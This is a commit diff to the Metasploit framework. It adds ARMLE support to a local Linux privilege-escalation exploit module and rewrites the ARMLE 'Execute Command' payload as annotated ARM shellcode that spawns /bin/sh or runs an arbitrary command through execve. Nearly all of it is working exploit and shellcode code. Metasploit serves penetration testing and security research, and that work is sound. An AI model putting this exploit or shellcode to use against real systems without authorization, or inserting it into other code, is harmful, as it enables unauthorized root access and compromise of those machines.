Fix ARMLE exec and add to Copy Fail

2026-04-30 19:54:25 -04:00
parent 5a2e7bb301
commit 0c81638fff
2 changed files with 49 additions and 21 deletions
@@ -48,8 +48,9 @@ class MetasploitModule < Msf::Exploit::Local
              'Platform' => ['linux', 'unix'],
              'Arch' => ARCH_CMD,
              # Space is constrained due to the max size of the resulting ELF executable (2024 on 6.8.0-79-generic
-              # x86_64, 2036 on 6.6.63-v8+ aarch64) if Metasploit changes the ELF executable size in the future, this
-              # may need to be updated
+              # x86_64, 2036 on 6.6.63-v8+ aarch64, 2028 on 5.15.44-Re4son-v7+ armv7l) if Metasploit changes the ELF
+              # executable size in the future, this may need to be updated. The Space here is the largest size that
+              # yeilds an ELF executable that fits all tested architectures.
              'Payload' => { 'Space' => 1847, 'DisableNops' => true }
            }
          ]
@@ -128,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Local
  def run_command(os_command)
    os_architecture = get_os_architecture

-    unless [ ARCH_X64, ARCH_AARCH64 ].include?(os_architecture)
+    unless [ ARCH_X64, ARCH_AARCH64, ARCH_ARMLE ].include?(os_architecture)
      # this is an artificial filter for MVP while the details for the other architectures are worked out and tested.
      fail_with(Failure::NoTarget, "#{os_architecture} targets are not supported.")
    end
@@ -3,16 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-###
-#
-# Exec
-# ----
-#
-# Executes an arbitrary command.
-#
-###
 module MetasploitModule
-  CachedSize = 29
+  CachedSize = 24

  include Msf::Payload::Single
  include Msf::Payload::Linux::Armle::Prepends
@@ -22,25 +14,60 @@ module MetasploitModule
      merge_info(
        info,
        'Name' => 'Linux Execute Command',
-        'Description' => 'Execute an arbitrary command',
-        'Author' => 'Jonathan Salwan',
+        'Description' => 'Execute an arbitrary command or just a /bin/sh shell',
+        'Author' => [
+          'Jonathan Salwan',
+          'Spencer McIntyre'
+        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_ARMLE
      )
    )

-    register_options(
-      [
-        OptString.new('CMD', [ true, 'The command string to execute' ]),
-      ]
-    )
+    register_options([
+      OptString.new('CMD', [ false, 'The command string to execute' ]),
+    ])
  end

  def generate(_opts = {})
    cmd = datastore['CMD'] || ''

-    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0a\x30" \
-      "\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf" + cmd
+    if cmd.empty?
+      # execve("/bin/sh", NULL, NULL)
+      shellcode = [
+        0xe28f000c, # add r0, pc, #12
+        0xe3a01000, # mov r1, #0
+        0xe3a02000, # mov r2, #0
+        0xe3a0700b, # mov r7, #11   # __NR_execve
+        0xef000000  # svc 0
+      ].pack('V*')
+      shellcode += "/bin/sh\x00"
+    else
+      # execve("/bin/sh", ["/bin/sh", "-c", CMD, NULL], NULL)
+      shellcode = [
+        0xe0244004, # eor r4, r4, r4
+        0xe92d0010, # push {r4}              ; argv[3] = NULL
+        0xe28f4030, # add r4, pc, #48        ; r4 = &cmd
+        0xe92d0010, # push {r4}              ; argv[2] = &cmd
+        0xe28f4024, # add r4, pc, #36        ; r4 = &"-c"
+        0xe92d0010, # push {r4}              ; argv[1] = &"-c"
+        0xe28f4014, # add r4, pc, #20        ; r4 = &"/bin/sh"
+        0xe92d0010, # push {r4}              ; argv[0] = &"/bin/sh"
+        0xe1a0100d, # mov r1, sp
+        0xe28f0008, # add r0, pc, #8         ; r0 = &"/bin/sh"
+        0xe3a02000, # mov r2, #0
+        0xe3a0700b, # mov r7, #11            ; __NR_execve
+        0xef000000  # svc 0
+      ].pack('V*')
+      shellcode += "/bin/sh\x00"
+      shellcode += "-c\x00\x00"
+      shellcode += cmd + "\x00"
+    end
+
+    # align our shellcode to 4 bytes
+    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+
+    super.to_s + shellcode
  end
 end